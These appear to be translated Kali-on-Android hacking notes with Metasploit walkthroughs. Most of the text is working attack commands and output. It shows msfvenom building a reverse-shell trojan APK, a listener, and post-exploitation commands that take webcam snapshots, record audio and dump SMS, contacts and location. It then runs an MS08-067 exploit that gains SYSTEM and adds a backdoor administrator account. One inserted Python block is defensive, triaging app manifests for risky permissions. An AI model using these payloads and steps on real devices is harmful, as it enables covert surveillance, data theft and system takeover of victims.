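Installing Kali on a phone: Android (rooted) + Linux Deploy + ConnectBot + VNC/RDP remote desktop client
Run Linux Deploy > set the app language > distribution: kali / distribution suite: sana
SSH: IP 127.0.0.1, default port 22
VNC: IP address 127.0.0.1, port 5900
Default account: android, password: changeme
Android remote control: DroidJack (configure the server program / IP / port)
Attacking Android from Kali with MSF: msf (android/meterpreter) + APK trojan
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=5555 R > /root/apk.apk # generate the APK trojan (remote shell agent)
# Set up the listener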
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 192.168.1.16
msf exploit(handler) > set LPORT 5555
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.16:5555
[*] Starting the payload handler …
# The target installs and runs it; the compromise succeeds
[*] Sending stage(60790 bytes) to 192.168.1.17
[*] Meterpreter session 1 opened (192.168.1.16:5555 -> 192.168.1.17) at 2016-08-16
# Follow-up actions
meterpreter > sysinfo # view system information
Computer : localhost
OS : Android 5.1.1 – Linux 4.0.9-android-x86
Meterpreter : java/android
meterpreter > cd /storage/emulated/0 # enter the file directory
# Camera control:
meterpreter > webcam_snap -i 1 # take a snapshot with the front camera
meterpreter > webcam_snap -i 2 # take a snapshot with the rear camera
[*] Starting…
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/.jpeg
Webcam Commands: 1 = front cam, 2 = rear cam
record_mic Record audio for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap -i 1[2] Take a snapshot from the specified webcam
webcam_stream -i 1[2] Play a video stream from the specified webcam
Android Commands:
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocate
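Seen from the defender's side, the webcam and Android commands listed above can only work if the installed APK holds the matching Android permissions, so a decoded AndroidManifest.xml is a quick triage point. The Python below is an added example, not part of the original notes; the threshold, the sample manifests and the package names are constructed assumptions, and it expects the manifest as text XML (for example as decoded by apktool).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
INTERNET = "android.permission.INTERNET"

# Android permission -> capability from the lists above that depends on it.
SENSITIVE = {
    "android.permission.CAMERA": "camera (webcam_snap/webcam_stream)",
    "android.permission.RECORD_AUDIO": "microphone (record_mic)",
    "android.permission.READ_SMS": "SMS (dump_sms)",
    "android.permission.READ_CONTACTS": "contacts (dump_contacts)",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.ACCESS_FINE_LOCATION": "location (geolocate)",
    "android.permission.ACCESS_COARSE_LOCATION": "location (geolocate)",
}

def triage(manifest_xml, threshold=4):
    """Flag a manifest that pairs network access with many sensitive permissions.
    threshold is an assumed cut-off for this example; tune it for your fleet."""
    root = ET.fromstring(manifest_xml)
    perms = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for node in root.iter(tag):
            name = node.get(ANDROID_NS + "name")
            if name:
                perms.add(name.strip())
    capabilities = sorted({SENSITIVE[p] for p in perms if p in SENSITIVE})
    return {
        "package": root.get("package"),
        "capabilities": capabilities,
        "suspicious": INTERNET in perms and len(capabilities) >= threshold,
    }

def _manifest(package, perms):  # helper that builds the constructed sample input
    rows = "".join('<uses-permission android:name="android.permission.%s"/>' % p
                   for p in perms)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="%s">%s<application/></manifest>' % (package, rows))

# Constructed samples (not taken from any real app).
SUSPECT = _manifest("com.example.flashlight", ["INTERNET", "CAMERA", "RECORD_AUDIO",
                    "READ_SMS", "READ_CONTACTS", "READ_CALL_LOG", "ACCESS_FINE_LOCATION"])
BENIGN = _manifest("com.example.scanner", ["INTERNET", "CAMERA"])

if __name__ == "__main__":
    for sample in (SUSPECT, BENIGN):
        print(triage(sample))
```

A hit is only a reason to look closer: legitimate messaging or backup apps can request the same set, so compare the result against what the app claims to do and where it was installed from.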
Attacking a PC from Kali on a phone: JuiceSSH + msf + ms08-067
~ msfconsole # start msf
msf > db_status
[*] postgresql connected to msf
# Scan for target information
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options # then set RHOST/LHOST
msf auxiliary(smb_version) > exploit
# Exploit the vulnerability
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets # operating systems affected by the vulnerability (attackable targets)
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows 2003 SP0 Universal
2 Windows XP SP0/SP1/SP2/SP3
msf exploit(ms08_067_netapi) > show options # then set rhost/lhost
msf exploit(ms08_067_netapi) > exploit -j
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…
# Follow-up actions
meterpreter > getuid
[*] Server username : NT AUTHORITY\SYSTEM
meterpreter > sysinfo # Computer/OS/System Language/Domain/Logged On Users information
meterpreter > net user # view login users
meterpreter > net user abc abc /add # add a user with a password
meterpreter > net localgroup administrators abc /add # grant administrator privileges
meterpreter > net user aa # view info for aa; remote GUI login